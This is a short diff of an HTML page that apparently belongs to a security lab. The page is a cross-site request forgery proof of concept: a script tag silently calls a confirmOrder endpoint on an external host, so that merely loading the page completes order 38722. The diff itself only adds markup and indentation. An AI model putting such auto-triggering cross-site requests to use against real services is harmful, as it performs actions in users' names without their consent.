--- a/order_completion.html
+++ b/order_completion.html
@@ -1,7 +1,9 @@
+<html>
 <head>
   <script src="http://shred-117275-ylok2a4pjxiiakfh.westus.cloudapp.azure.com/Skate/confirmOrder?orderId=38722"></script>
 </head>
 <body>
-<h1>Auto-completion of your order</h1>
-<p>Just loading this page completes your order with ID 38722.</p>
+  <h1>Auto-completion of your order</h1>
+  <p>Just loading this page completes your order with ID 38722.</p>
 </body>
+</html>
